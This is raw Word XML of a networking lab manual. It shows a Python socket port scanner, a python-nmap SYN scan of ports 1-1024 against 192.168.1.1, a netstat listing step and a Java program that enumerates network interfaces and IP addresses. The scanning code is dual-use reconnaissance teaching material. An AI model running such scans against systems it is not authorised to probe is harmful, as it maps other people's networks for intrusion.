        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Linux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Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFFD076" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs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z w:val="24"/>
        </w:rPr>
        <w:t>Nano,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etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ED0706" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E3347F2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705BF5CA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12F12F49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Libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AFC262" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86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terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C112A6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="10"/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rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>python-nmap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scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F55D78" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B0FA57A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python-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324C0DD7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2ABBC6C0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C47ED5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D426502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nmap;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print('nmap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installed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successfully')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4729B6F9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265D4B1C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spacing w:val="-2"/>
        </w:rPr>
        <w:t>Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64172878" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67785F61" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85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port_scanner.py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  <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ports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socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-57"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEFF9A3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85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script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04489D30" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70C2EC0A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socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E61EEB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173CC469" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1560" w:right="5720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scan_ports(target,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ports): for port in ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1147BBFA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sock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socket.socket(socket.AF_INET,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socket.SOCK_STREAM) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sock.settimeout(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08031DE8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040" w:right="3449"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>result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sock.connect_ex((target,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port)) if result == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9F1253" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040" w:right="3449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print(f"Port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{port}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open") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sock.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438EF5D2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225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target_ip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"192.168.1.1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E795EAA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1800" w:right="3449" w:hanging="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ports_to_scan = [22, 80, 443, 8080] scan_ports(target_ip,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ports_to_scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713196BE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70E1F3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="74"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/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open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0398E28D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B37E256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port_scanner.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F2D00A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0323DE76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nmap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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121A0BA5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C3D63F5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84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python-nmap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scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A305C29" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84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script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4C668A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="16"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A068736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4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277DFC9C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2750A5EB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nmap_scan(target):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF9F984" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1560" w:right="4139"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>scanner = nmap.PortScanner() scanner.scan(target,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'1-1024',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'-sS') for port in scanner[target]['tcp']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE6324B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print(f"Port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{port}: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{scanner[target]['tcp'][port]['state']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D242BF4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FB71F22" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1800" w:right="5229" w:hanging="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">target_ip = "192.168.1.1" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>nmap_scan(target_ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F323FFB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05CD57DB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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scan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B00D9A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A06AAC1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port_scanner.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD197D5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FBAD1E6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000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0D13206D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31CFAE18" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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to scan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known local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>or remote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machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0756A6EA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ports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224E0A78" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26F45E8F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netstat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tulnp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DC59F0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="50"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B72F254" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Compare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12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socket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nmap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2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C74572" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EC02AD0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6D3745E7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="274" w:lineRule="exact"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>◻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scans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ports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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C818EAC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="274" w:lineRule="exac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4B6216" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="600"/>
        </w:tabs>
        <w:spacing w:before="81" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="1139" w:firstLine="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default gateways from system network settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FE9460" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288EEB10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DDC8388" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="783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extracts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 IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>addresses,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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default gateways from system network settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAEAD27" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B35AC93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652A637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26367A7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1304DD7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Command Line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(Windows/Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB17EA4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="005433F2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395980A3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39A8D01F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Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C451480" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82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z w:val="24"/>
        </w:rPr>
        <w:t>(JDK) if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>not already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installed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213020CF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E67626A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version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3765B4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3B45AB7E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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such as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Eclipse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IntelliJ IDEA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>for writing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and running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programs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD0D969" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39318CC7" w14:textId="77777777" w:rsidR="00A16F47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4"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF27D0B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB3E52A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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NetworkInterface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obtain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>network-related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396B51C0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>InetAddress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retrieve IP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addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652C1641" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="275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675E9DD8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33DA4654" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:line="280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Java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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>NetworkDetails.java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C8DCB5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:line="272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program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC7DD93" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="15"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="418C37BB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:right="6526"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>import java.net.*;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java.util.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B42C6EB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BD5F1E0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NetworkDetails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ACE350" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040" w:right="4068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 try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68992BBB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:firstLine="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Enumeration&lt;NetworkInterface&gt;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interfaces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 xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>NetworkInterface.getNetworkInterfaces();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572FA390" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1" w:line="226" w:lineRule="exact"/>
        <w:ind w:left="252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(interfaces.hasMoreElements())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9A2A41A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="3001"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>NetworkInterface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interfaces.nextElement(); System.out.println("Interface: " +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7E5CA6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network.getDisplayName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB53907" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:firstLine="1920"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Enumeration&lt;InetAddress&gt;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addresses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= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>network.getInetAddresses();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C598A85" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:ind w:left="3001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(addresses.hasMoreElements())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42240D5F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="3481"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>InetAddress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addresses.nextElement(); System.out.println(" IP Address: " +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C21D57E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address.getHostAddress());</w:t>
